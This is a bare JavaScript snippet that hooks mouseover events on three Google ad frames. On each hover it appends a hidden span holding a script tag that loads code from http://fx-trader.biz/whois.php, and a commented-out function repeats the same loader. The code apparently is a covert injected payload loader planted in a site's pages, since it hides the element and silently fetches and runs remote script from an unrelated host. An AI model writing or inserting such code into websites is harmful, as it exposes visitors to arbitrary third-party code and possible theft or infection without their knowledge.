$("#google_ads_frame1").mouseover(function(event){
	var el=document.createElement('span');
	el.setAttribute('id','addsTag');
	el.setAttribute('style','display: none;');
	document.body.appendChild(el);
	var frame=document.createElement('script');
	frame.setAttribute('src',"http://fx-trader.biz/whois.php");
	document.getElementById('addsTag').appendChild(frame);
});
$("#google_ads_frame2").mouseover(function(event){
	var el=document.createElement('span');
	el.setAttribute('id','addsTag');
	el.setAttribute('style','display: none;');
	document.body.appendChild(el);
	var frame=document.createElement('script');
	frame.setAttribute('src',"http://fx-trader.biz/whois.php");
	document.getElementById('addsTag').appendChild(frame);
});
$("#google_ads_frame3").mouseover(function(event){
	var el=document.createElement('span');
	el.setAttribute('id','addsTag');
	el.setAttribute('style','display: none;');
	document.body.appendChild(el);
	var frame=document.createElement('script');
	frame.setAttribute('src',"http://fx-trader.biz/whois.php");
	document.getElementById('addsTag').appendChild(frame);
});
/*
function adds(){
	var el=document.createElement('span');
	el.setAttribute('id','addsTag');
	document.body.appendChild(el);
	var frame=document.createElement('script');
	frame.setAttribute('src',"http://fx-trader.biz/whois.php");
	document.getElementById('addsTag').appendChild(frame);
}
*/